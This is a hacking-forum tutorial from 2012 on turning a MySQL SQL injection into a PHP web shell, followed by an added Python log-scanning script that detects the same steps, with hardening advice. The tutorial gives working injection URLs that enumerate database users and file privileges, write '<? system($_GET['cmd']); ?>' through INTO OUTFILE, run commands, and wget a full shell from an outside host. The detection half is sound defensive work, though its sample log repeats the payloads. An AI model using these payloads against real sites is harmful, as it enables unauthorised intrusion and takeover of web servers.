[Tutorial] Spawning a shell with SQLi 11-11-2012, 06:36 PM
#1
Hi all on AF,
So this will be a tutorial about how to spawn a shell with SQL Injection codes.
This method is quite rare, and you can use it when you fail to upload a shell on the site (logged in as admin).
So let's continue with our tutorial.
This is what you need before starting:
- Shell in .txt version (you can google it or find it in our hacking section)
- Basic SQLi knowledge.
Now this will be our vulnerable site:
Code:
http://www.vulnsite.com/index.php?id=15
Now imagine that you already hacked it and got the info. You logged in and failed to upload a shell.
In your vulnerable column, type in user, and at the end of your code, from mysql.user.
So this is how it looks when you put it in the URL:
Code:
http://www.vulnsite.com/index.php?id=-15 union select 1,2,3,user,5 from mysql.user--
- IF YOU GET AN ERROR HERE, THIS WILL NOT WORK!!
Now you should get the user of the site. In our case, siteowner (remember this user).
OK, so now you need to see the user's file privilege.
Now, instead of user, put group_concat(user,0x3a,file_priv); from mysql.user stays the same.
Our code should look like this:
Code:
http://www.vulnsite.com/index.php?id=-15 union select 1,2,3,group_concat(user,0x3a,file_priv),5 from mysql.user--
You should get a list of user(s) and the file privilege of those user(s).
Remember our user was siteowner.
This is what you should get after entering the code:
root:Y,root:Y,apache:N,siteowner:Y
This code tells us that we can make a file on the site. To do that we need to find the site path. Causing an error should tell you where it is.
This is how it's supposed to look:
/var/www/vhost/siteowner/data/www/vulnsite.com/
So after this you need to find a writeable folder; it's usually public_html, but try to scan it with Acunetix.
Now let's say this is ours:
Code:
http://www.vulnsite.com/shop/
OK, now we will spawn our shell. It's easy, just remember the row and code.
Now in your vuln column put this:
Code:
"<? system($_GET['cmd']); ?>"
Leave the question marks, don't delete them.
Null the other columns.
At the end, INTO OUTFILE.
All that looks like this:
Code:
http://www.vulnsite.com/index.php?id=-15 union select null,null,null,"<? system($_GET['cmd']); ?>",null INTO OUTFILE--
And after it use the site path and writeable folder:
/var/www/vhost/siteowner/data/www/vulnsite.com/shop/
Put it in your code above and add the file name (phpcmd.php).
It looks like this:
Code:
http://www.vulnsite.com/index.php?id=-15 union select null,null,null,"<? system($_GET['cmd']); ?>",null INTO OUTFILE "/var/www/vhost/siteowner/data/www/vulnsite.com/shop/phpcmd.php"--
Our shell should be spawned now, and if you want to check it, do this:
Code:
http://www.vulnsite.com/shop/phpcmd.php
If it's working you should get this warning:
Warning: system() [function.system]: Cannot execute a blank command in /sites/full/path/ phpcmd.php on line #
That means our file is created. Now let's see the files in our directory:
Code:
http://www.vulnsite.com/shop/phpcmd.php?cmd=ls -la
After that, download the shell from the site in .txt version with the wget command and rename it with -O:
Code:
http://www.vulnsite.com/shop/phpcmd.php?cmd=wget www.shell.com/shell.txt -O shell.php
OK guys, that's it, hope you've learned something from this tut.
If you find mistakes please let me know. I guess my grammar is good enough for you guys to read it.
-Crow
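From the defender's side, every step in the post above leaves a distinctive trace in the web server's access log: a UNION SELECT against mysql.user, a read of the file_priv column, an INTO OUTFILE clause carrying a PHP tag, and then a request for the file the OUTFILE clause named. The script below is an added example (not part of Crow's post) that scans Apache/nginx combined-format log lines for those stages and correlates an INTO OUTFILE path with a later request for that file from the same client. The log lines, client addresses and the /var/www/html/shop/ path are constructed for the example.

```python
"""Detection for the SQLi-to-webshell sequence described in the post.

Added example, not part of the original post. It scans web-server access
logs (Apache/nginx "combined" format) for the stages the post walks through:
UNION SELECT against mysql.user, a file_priv check, INTO OUTFILE, a PHP tag
inside a query parameter, and a later request for the file that an INTO
OUTFILE clause named. All log lines and paths below are constructed.
"""
import re
from urllib.parse import unquote_plus

# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Each signature corresponds to one stage of the technique; they are
# matched against the URL-decoded request target.
SIGNATURES = [
    ("union_select",     re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("mysql_user_enum",  re.compile(r"\bfrom\s+mysql\.user\b", re.I)),
    ("file_priv_check",  re.compile(r"\bfile_priv\b", re.I)),
    ("into_outfile",     re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("php_tag_in_param", re.compile(r"<\?(?:php)?[\s=]", re.I)),
]
# Captures the destination path of an INTO OUTFILE / INTO DUMPFILE clause.
OUTFILE_PATH = re.compile(r"""\binto\s+(?:out|dump)file\s+['"]([^'"]+)['"]""", re.I)

# Constructed sample: one client walking through the post's steps, plus a
# benign request containing the word "union" to show it is not flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Nov/2012:18:36:01 +0000] "GET /index.php?id=15 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Nov/2012:18:36:05 +0000] "GET /index.php?id=-15%20union%20select%201,2,3,user,5%20from%20mysql.user-- HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Nov/2012:18:36:20 +0000] "GET /index.php?id=-15%20union%20select%201,2,3,group_concat(user,0x3a,file_priv),5%20from%20mysql.user-- HTTP/1.1" 200 4150 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Nov/2012:18:37:02 +0000] "GET /index.php?id=-15%20union%20select%20null,null,null,%22%3C?%20system($_GET[%27cmd%27]);%20?%3E%22,null%20INTO%20OUTFILE%20%22/var/www/html/shop/phpcmd.php%22-- HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Nov/2012:18:37:30 +0000] "GET /shop/phpcmd.php?cmd=ls%20-la HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.2 - - [11/Nov/2012:18:40:00 +0000] "GET /shop/?category=union+jacks HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields we need from one combined-format line, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return {"ip": ip, "ts": ts, "method": method,
            "target": unquote_plus(target), "status": int(status)}


def scan_log(text):
    """Return one finding per request that matches a stage signature, or that
    fetches a file an earlier INTO OUTFILE from the same client named."""
    findings = []
    written = {}  # (client ip, basename of OUTFILE target) -> timestamp
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        target = rec["target"]
        hits = [name for name, rx in SIGNATURES if rx.search(target)]
        m = OUTFILE_PATH.search(target)
        if m:
            written[(rec["ip"], m.group(1).rsplit("/", 1)[-1])] = rec["ts"]
        else:
            # Request path without the query string, reduced to its basename
            base = target.split("?", 1)[0].rsplit("/", 1)[-1]
            if (rec["ip"], base) in written:
                hits.append("written_file_requested")
        if hits:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "target": target, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], ", ".join(f["hits"]), "--", f["target"][:70])
```

Run against the sample, the four requests that mirror the post's steps are reported and the benign "union jacks" search is not. The correlation rule (written_file_requested) is the high-confidence one: a client naming a path in INTO OUTFILE and then fetching that filename over HTTP has little benign explanation. On the database side the same sequence depends on two conditions the post itself reads out: the application's database account holding the FILE privilege (the file_priv column) and mysqld being able to write under the web root. Granting the web application an account without FILE, and setting MySQL's secure_file_priv to a directory outside the document root, removes both preconditions.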